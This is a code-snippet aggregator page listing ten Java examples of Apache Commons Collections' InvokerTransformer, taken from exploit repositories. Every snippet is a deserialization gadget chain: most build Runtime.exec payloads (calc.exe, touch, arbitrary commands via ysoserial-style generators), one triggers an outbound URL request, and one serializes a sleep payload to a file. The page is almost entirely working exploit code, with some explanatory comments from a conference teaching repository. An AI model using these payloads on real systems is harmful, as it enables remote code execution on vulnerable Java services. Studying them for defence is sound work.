当前位置: 首页>>代码示例>>Java>>正文


Java InvokerTransformer类代码示例

本文整理汇总了Java中org.apache.commons.collections.functors.InvokerTransformer的典型用法代码示例。如果您正苦于以下问题:Java InvokerTransformer类的具体用法?Java InvokerTransformer怎么用?Java InvokerTransformer使用的例子?那么恭喜您, 这里精选的类代码示例或许可以为您提供帮助。


InvokerTransformer类属于org.apache.commons.collections.functors包,在下文中一共展示了InvokerTransformer类的10个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于系统推荐出更棒的Java代码示例。

示例1: Reverse_Payload

import org.apache.commons.collections.functors.InvokerTransformer; //导入依赖的package包/类
public static Object Reverse_Payload() throws Exception {
    Transformer[] transformers = new Transformer[]{
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class},
                    new Object[]{"getRuntime", new Class[0]}),
            new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class},
                    new Object[]{null, new Object[0]}),
            new InvokerTransformer("exec", new Class[]{String.class},
                    new Object[]{"calc.exe"})};
    Transformer transformerChain = new ChainedTransformer(transformers);

    Map pocMap = new HashMap();
    pocMap.put("value", "value");
    Map outmap = TransformedMap.decorate(pocMap, null, transformerChain);
    //通过反射获得AnnotationInvocationHandler类对象
    Class cls = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
    //通过反射获得cls的构造函数
    Constructor ctor = cls.getDeclaredConstructor(Class.class, Map.class);
    //这里需要设置Accessible为true,否则序列化失败
    ctor.setAccessible(true);
    //通过newInstance()方法实例化对象
    Object instance = ctor.newInstance(Retention.class, outmap);
    return instance;
}
 
开发者ID:yrzx404,项目名称:interview-question-code,代码行数:25,代码来源:App.java

示例2: getObject

import org.apache.commons.collections.functors.InvokerTransformer; //导入依赖的package包/类
public BadAttributeValueExpException getObject(final String command) throws Exception {
	final String[] execArgs = new String[] { command };
	// inert chain for setup
	final Transformer transformerChain = new ChainedTransformer(
	        new Transformer[]{ new ConstantTransformer(1) });
	// real chain for after setup
	final Transformer[] transformers = new Transformer[] {
			new ConstantTransformer(Runtime.class),
			new InvokerTransformer("getMethod", new Class[] {
				String.class, Class[].class }, new Object[] {
				"getRuntime", new Class[0] }),
			new InvokerTransformer("invoke", new Class[] {
				Object.class, Object[].class }, new Object[] {
				null, new Object[0] }),
			new InvokerTransformer("exec",
				new Class[] { String.class }, execArgs),
			new ConstantTransformer(1) };

	final Map innerMap = new HashMap();

	final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);

	TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");

	BadAttributeValueExpException val = new BadAttributeValueExpException(null);
	Field valfield = val.getClass().getDeclaredField("val");
	valfield.setAccessible(true);
	valfield.set(val, entry);

	Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain

	return val;
}
 
开发者ID:hucheat,项目名称:APacheSynapseSimplePOC,代码行数:34,代码来源:CommonsCollections5.java

示例3: getObject

import org.apache.commons.collections.functors.InvokerTransformer; //导入依赖的package包/类
public InvocationHandler getObject(final String command) throws Exception {
	final String[] execArgs = new String[] { command };
	// inert chain for setup
	final Transformer transformerChain = new ChainedTransformer(
		new Transformer[]{ new ConstantTransformer(1) });
	// real chain for after setup
	final Transformer[] transformers = new Transformer[] {
			new ConstantTransformer(Runtime.class),
			new InvokerTransformer("getMethod", new Class[] {
				String.class, Class[].class }, new Object[] {
				"getRuntime", new Class[0] }),
			new InvokerTransformer("invoke", new Class[] {
				Object.class, Object[].class }, new Object[] {
				null, new Object[0] }),
			new InvokerTransformer("exec",
				new Class[] { String.class }, execArgs),
			new ConstantTransformer(1) };

	final Map innerMap = new HashMap();

	final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);

	final Map mapProxy = Gadgets.createMemoitizedProxy(lazyMap, Map.class);

	final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(mapProxy);

	Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain

	return handler;
}
 
开发者ID:hucheat,项目名称:APacheSynapseSimplePOC,代码行数:31,代码来源:CommonsCollections1.java

示例4: main

import org.apache.commons.collections.functors.InvokerTransformer; //导入依赖的package包/类
@SuppressWarnings ( {"unchecked"} )
public static void main(String[] args)
        throws ClassNotFoundException, NoSuchMethodException, InstantiationException,
        IllegalAccessException, IllegalArgumentException, InvocationTargetException {

    String cmd[] = {"/bin/sh", "-c", "touch /tmp/h2hc_lazymap"}; // Comando a ser executado

    Transformer[] transformers = new Transformer[] {
            // retorna Class Runtime.class
            new ConstantTransformer(Runtime.class),
            // 1o. Objeto InvokerTransformer: .getMethod("getRuntime", new Class[0])
            new InvokerTransformer(
                    "getMethod",                                    // invoca método getMethod
                    ( new Class[] {String.class, Class[].class } ),// tipos dos parâmetros: (String, Class[])
                    ( new Object[] {"getRuntime", new Class[0] } ) // parâmetros: (getRuntime, Class[0])
            ),
            // 2o. Objeto InvokerTransformer: .invoke(null, new Object[0])
            new InvokerTransformer(
                    "invoke",                                      // invoca método: invoke
                    (new Class[] {Object.class, Object[].class }),// tipos dos parâmetros: (Object.class, Object[])
                    (new Object[] {null, new Object[0] })         // parâmetros: (null, new Object[0])
            ),
            // 3o. Objeto InvokerTransformer: .exec(cmd[])
            new InvokerTransformer(
                    "exec",                                       // invoca método: exec
                    new Class[] { String[].class },              // tipos dos parâmetros: (String[])
                    new Object[]{ cmd } )                        // parâmetros: (cmd[])
    };

    // Cria o objeto ChainedTransformer com o array de Transformers:
    Transformer transformerChain = new ChainedTransformer(transformers);
    // Cria o map
    Map map = new HashMap();
    // Decora o map com o LazyMap e a cadeia de transformações como factory
    Map lazyMap = LazyMap.decorate(map,transformerChain);

    lazyMap.get("h2hc2"); // Tenta recuperar uma chave inexistente (BUM)

}
 
开发者ID:joaomatosf,项目名称:JavaDeserH2HC,代码行数:40,代码来源:ExampleTransformersWithLazyMap.java

示例5: getObject

import org.apache.commons.collections.functors.InvokerTransformer; //导入依赖的package包/类
public BadAttributeValueExpException getObject(CmdExecuteHelper cmdHelper) throws Exception {

		final String[] execArgs = cmdHelper.getCommandArray();
		// inert chain for setup
		final Transformer transformerChain = new ChainedTransformer(
		        new Transformer[]{ new ConstantTransformer(1) });
		// real chain for after setup
		final Transformer[] transformers = new Transformer[] {
				new ConstantTransformer(Runtime.class),
				new InvokerTransformer("getMethod", new Class[] {
					String.class, Class[].class }, new Object[] {
					"getRuntime", new Class[0] }),
				new InvokerTransformer("invoke", new Class[] {
					Object.class, Object[].class }, new Object[] {
					null, new Object[0] }),
				new InvokerTransformer("exec",
					new Class[] { String[].class }, new Object[]{execArgs}),
				new ConstantTransformer(1) };

		final Map innerMap = new HashMap();

		final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
		
		TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");
		
		BadAttributeValueExpException val = new BadAttributeValueExpException(null);
		Field valfield = val.getClass().getDeclaredField("val");
		valfield.setAccessible(true);
		valfield.set(val, entry);

		Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain

		return val;
	}
 
开发者ID:pimps,项目名称:ysoserial-modified,代码行数:35,代码来源:CommonsCollections5.java

示例6: getObject

import org.apache.commons.collections.functors.InvokerTransformer; //导入依赖的package包/类
public InvocationHandler getObject(CmdExecuteHelper cmdHelper) throws Exception {

		final String[] execArgs = cmdHelper.getCommandArray();
		// inert chain for setup
		final Transformer transformerChain = new ChainedTransformer(
			new Transformer[]{ new ConstantTransformer(1) });
		// real chain for after setup
		final Transformer[] transformers = new Transformer[] {
				new ConstantTransformer(Runtime.class),
				new InvokerTransformer("getMethod", new Class[] {
					String.class, Class[].class }, new Object[] {
					"getRuntime", new Class[0] }),
				new InvokerTransformer("invoke", new Class[] {
					Object.class, Object[].class }, new Object[] {
					null, new Object[0] }),
				new InvokerTransformer("exec",
					new Class[] { String[].class }, new Object[]{execArgs}),
				new ConstantTransformer(1) };

		final Map innerMap = new HashMap();

		final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
		
		final Map mapProxy = Gadgets.createMemoitizedProxy(lazyMap, Map.class);
		
		final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(mapProxy);
		
		Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain	
				
		return handler;
	}
 
开发者ID:pimps,项目名称:ysoserial-modified,代码行数:32,代码来源:CommonsCollections1.java

示例7: getObject

import org.apache.commons.collections.functors.InvokerTransformer; //导入依赖的package包/类
public InvocationHandler getObject(final String command) throws Exception {
	final String[] execArgs = new String[] { command };
	// inert chain for setup
	final Transformer transformerChain = new ChainedTransformer(
		new Transformer[]{ new ConstantTransformer(1) });
	// real chain for after setup
	final Transformer[] transformers = new Transformer[] {
			new ConstantTransformer(Runtime.class),
			new InvokerTransformer("getMethod", new Class[] {
				String.class, Class[].class }, new Object[] {
				"getRuntime", new Class[0] }),
			new InvokerTransformer("invoke", new Class[] {
				Object.class, Object[].class }, new Object[] {
				null, new Object[0] }),
			new InvokerTransformer("exec",
				new Class[] { String.class }, execArgs),
			new ConstantTransformer(1) };

	final Map innerMap = new HashMap();

	final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
	
	final Map mapProxy = Gadgets.createMemoitizedProxy(lazyMap, Map.class);
	
	final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(mapProxy);
	
	Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain	
			
	return handler;
}
 
开发者ID:NetSPI,项目名称:JavaSerialKiller,代码行数:31,代码来源:CommonsCollections1.java

示例8: getObject

import org.apache.commons.collections.functors.InvokerTransformer; //导入依赖的package包/类
public InvocationHandler getObject(final String command) throws Exception {
    final String[] execArgs = new String[] { command };
    // inert chain for setup
    final Transformer transformerChain = new ChainedTransformer(
            new Transformer[]{ new ConstantTransformer(1) });
    // real chain for after setup
    final Transformer[] transformers = new Transformer[] {
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod", new Class[] {
                    String.class, Class[].class }, new Object[] {
                    "getRuntime", new Class[0] }),
            new InvokerTransformer("invoke", new Class[] {
                    Object.class, Object[].class }, new Object[] {
                    null, new Object[0] }),
            new InvokerTransformer("exec",
                    new Class[] { String.class }, execArgs),
            new ConstantTransformer(1) };

    final Map innerMap = new HashMap();

    final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);

    final Map mapProxy = Gadgets.createMemoitizedProxy(lazyMap, Map.class);

    final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(mapProxy);

    Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain

    return handler;
}
 
开发者ID:njfox,项目名称:Java-Deserialization-Exploit,代码行数:31,代码来源:CommonsCollections1.java

示例9: main

import org.apache.commons.collections.functors.InvokerTransformer; //导入依赖的package包/类
@SuppressWarnings ( {"unchecked"} )
public static void main(String[] args)
        throws ClassNotFoundException, NoSuchMethodException, InstantiationException,
        IllegalAccessException, IllegalArgumentException, InvocationTargetException, IOException {

    String url = args[0];
    // Cria array de transformers que resulta na seguinte construção:
    // new URL(url).openConnection().getInputStream().read();
    Transformer[] transformers = new Transformer[] {
            new ConstantTransformer(new URL(url)),
            new InvokerTransformer("openConnection", new Class[] { }, new Object[] {}),
            new InvokerTransformer("getInputStream", new Class[] { }, new Object[] {}),
            new InvokerTransformer("read", new Class[] {}, new Object[] {})
    };

    // Cria o objeto ChainedTransformer com o array de Transformers:
    Transformer transformerChain = new ChainedTransformer(transformers);
    // Cria o map
    Map map = new HashMap();
    // Decora o map com o LazyMap e a cadeia de transformações como factory
    Map lazyMap = LazyMap.decorate(map,transformerChain);

    // Usa reflexão para obter referencia da classe AnnotationInvocationHandler
    Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
    // Obtem construtor da AnnotationInvocationHandler que recebe um tipo (class) e um Map
    Constructor ctor = cl.getDeclaredConstructor(Class.class, Map.class);
    // Torna o construtor acessível
    ctor.setAccessible(true);
    // Obtem/Cria instancia do AnnotationInvocationHandler, fornecendo (via construtor) um Retetion.class (que eh um
    // type Annotation, requerido pelo construtor) e atribui o LazyMap (contendo a cadeia de Transformers) ao campo
    // memberValues. Assim, ao tentar obter uma chave inexiste deste campo, a cadeia será "executada"!
    InvocationHandler handlerLazyMap = (InvocationHandler) ctor.newInstance(Retention.class, lazyMap);

    //criado a interface map
    Class[] interfaces = new Class[] {java.util.Map.class};
    // cria o Proxy "entre" a interface Map e o AnnotationInvocationHandler anterior (que contém o lazymap+transformers)
    Map proxyMap = (Map) Proxy.newProxyInstance(null, interfaces, handlerLazyMap);

    // cria outro AnnotationInvocationHandler atribui o Proxy ao campo memberValues
    // esse Proxy será "acionado" no magic method readObject e, assim, desviará o fluxo para o
    // método invoke() do primeiro AnnotationInvocationHandler criado (que contém o LazyMap+Transformers)
    InvocationHandler handlerProxy = (InvocationHandler) ctor.newInstance(Retention.class, proxyMap);

    // Serializa o objeto "handlerProxy" e o salva em arquivo. Ao ser desserializado,
    // o readObject irá executar um map.entrySet() e, assim, desviar o fluxo para o invoke().
    // No invoke(), uma chave inexistente será buscada no campo "memberValues" (que contém um LazyMap
    // com a cadeia de Transformers), o que deverá acionar o Thread.sleep(10000)!
    System.out.println("Saving serialized object in SleepExample.ser");
    FileOutputStream fos = new FileOutputStream("SleepExample.ser");
    ObjectOutputStream oos = new ObjectOutputStream(fos);
    oos.writeObject(handlerProxy);
    oos.flush();

}
 
开发者ID:joaomatosf,项目名称:JavaDeserH2HC,代码行数:55,代码来源:DnsWithCommonsCollections.java

示例10: main

import org.apache.commons.collections.functors.InvokerTransformer; //导入依赖的package包/类
@SuppressWarnings ( {"unchecked"} )
public static void main(String[] args)
        throws ClassNotFoundException, NoSuchMethodException, InstantiationException,
        IllegalAccessException, IllegalArgumentException, InvocationTargetException, IOException {

    // Cria array de Transformers que irá resultar na seguinte construção:
    //Thread.class.getMethod("sleep", new Class[]{Long.TYPE}).invoke(null, new Object[]{10000L});
    Transformer[] transformers = new Transformer[] {
        new ConstantTransformer(Thread.class), // retorna class Thread.class
        // 1o. Objeto InvokerTransformer: getMethod("sleep", new Class[]{Long.TYPE})
        new InvokerTransformer(
            "getMethod",                        // invoca método getMethod
            ( new Class[] {String.class, Class[].class } ), // tipos dos parâmetros: (String, Class[])
            ( new Object[] {"sleep", new Class[]{Long.TYPE} } ) // parâmetros: (sleep, new Class[]{Long.TYPE})
        ),
        // 2o. Objeto InvokerTransformer: invoke(null, new Object[]{10000L})
        new InvokerTransformer(
            "invoke",                           // invoca método: invoke
            (new Class[] {Object.class, Object[].class }),// tipos dos parâmetros: (Object.class, Object[])
            (new Object[] {null, new Object[] {10000L} }) // parâmetros: (null, new Object[] {10000L})
        )
    };

    // Cria o objeto ChainedTransformer com o array de Transformers:
    Transformer transformerChain = new ChainedTransformer(transformers);
    // Cria o map
    Map map = new HashMap();
    // Decora o map com o LazyMap e a cadeia de transformações como factory
    Map lazyMap = LazyMap.decorate(map,transformerChain);

    // Usa reflexão para obter referencia da classe AnnotationInvocationHandler
    Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
    // Obtem construtor da AnnotationInvocationHandler que recebe um tipo (class) e um Map
    Constructor ctor = cl.getDeclaredConstructor(Class.class, Map.class);
    // Torna o construtor acessível
    ctor.setAccessible(true);
    // Obtem/Cria instancia do AnnotationInvocationHandler, fornecendo (via construtor) um Retetion.class (que eh um
    // type Annotation, requerido pelo construtor) e atribui o LazyMap (contendo a cadeia de Transformers) ao campo
    // memberValues. Assim, ao tentar obter uma chave inexiste deste campo, a cadeia será "executada"!
    InvocationHandler handlerLazyMap = (InvocationHandler) ctor.newInstance(Retention.class, lazyMap);

    //cria a interface map
    Class[] interfaces = new Class[] {java.util.Map.class};
    // cria o Proxy "entre" a interface Map e o AnnotationInvocationHandler anterior (que contém o lazymap+transformers)
    Map proxyMap = (Map) Proxy.newProxyInstance(null, interfaces, handlerLazyMap);

    // cria outro AnnotationInvocationHandler atribui o Proxy ao campo memberValues
    // esse Proxy será "acionado" no magic method readObject e, assim, desviará o fluxo para o
    // método invoke() do primeiro AnnotationInvocationHandler criado (que contém o LazyMap+Transformers)
    InvocationHandler handlerProxy = (InvocationHandler) ctor.newInstance(Retention.class, proxyMap);

    // Serializa o objeto "handlerProxy" e o salva em arquivo. Ao ser desserializado,
    // o readObject irá executar um map.entrySet() e, assim, desviar o fluxo para o invoke().
    // No invoke(), uma chave inexistente será buscada no campo "memberValues" (que contém um LazyMap
    // com a cadeia de Transformers), o que deverá acionar o Thread.sleep(10000)!
    System.out.println("Saving serialized object in SleepExample.ser");
    FileOutputStream fos = new FileOutputStream("SleepExample.ser");
    ObjectOutputStream oos = new ObjectOutputStream(fos);
    oos.writeObject(handlerProxy);
    oos.flush();

}
 
开发者ID:joaomatosf,项目名称:JavaDeserH2HC,代码行数:63,代码来源:SleepExample.java


注:本文中的org.apache.commons.collections.functors.InvokerTransformer类示例由纯净天空整理自Github/MSDocs等开源代码及文档管理平台,相关代码片段筛选自各路编程大神贡献的开源项目,源码版权归原作者所有,传播和使用请参考对应项目的License;未经允许,请勿转载。